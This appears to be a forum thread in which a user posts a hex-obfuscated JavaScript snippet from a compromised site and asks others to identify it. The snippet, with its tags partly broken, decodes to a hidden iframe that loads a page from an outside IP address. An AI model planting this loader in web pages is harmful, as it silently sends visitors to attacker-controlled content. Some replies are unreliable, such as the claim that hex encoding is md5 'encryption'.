iframe src='http://url' width='1' height='1' style='visibility: hidden;' /iframe
<---script>
function v475e59178e2f2(v475e59178e6da){
var v475e59178eac0=16;
return(parseInt(v475e59178e6da,v475e59178eac0));
}
function v475e59178f294(v475e59178f678) {
var v475e59178fa6a='';
for(v475e59178feb8=0;
v475e59178feb8<v475e59178f678.length; v475e59178feb8+=2)
{ v475e59178fa6a+=(String.fromCharCode(v475e59178e2f2(v475e59178f678.substr(v475e59178feb8, 2))));
}
return v475e59178fa6a; }
document.write(v475e59178f294('3C5343524950543E77696E646F772E73
74617475733D27446F6E65273B646F63756D656E742E777269746528273C
696672616D65206E616D653D6261326238207372633D5C27687474703A2
F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272
4D6174682E726F756E64284D6174682E72616E646F6D28292A313632343
330292B276564613738666366665C272077696474683D333730206865696
768743D343339207374796C653D5C27646973706C61793A206E6F6E655C
273E3C2F696672616D653E27293C2F5343524950543E'));
<----/script>
had to get rid of some brackets to post the code, looks to me like an iframe XSS of some sort...possibly something to get data while open, password manager stuff perhaps ? dunno, buddy of mine i guess his crap got hacked or something now he has this, just shoot me thoughts...
on one of the videos the guy says that the hacker encodes the exploit
watch Advanced Web Application and Database Threat Analysis with MatriXay
for more info
ohhh.....I had such code in a Wordpress template already...it's encrypted code like bubzuru said (using either md5 or the php crypt(); function)m so you can't edit it too easy. in the template I had it was used to display some crappy links....so actually it can be anything.... but the 1-pixel iframe thingy looks pretty strange, could be a cookie stealer or sth like that...
who knows, i guess my buddy kinda got it figured out, he;ll be alright, i just wish he'd stop asking me to crack shit for him and identify what type of encryption something is on
the 1x1 pixel is a web-bug, remember any time your computer has to access a server - in this case, for a 'invisible' img src - your IP is logged on that server. Server side exploits can then take over from there, such as grepping OS, browser type/ver, or locating a specific file..
as far as what this author is doing, I don't know.
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.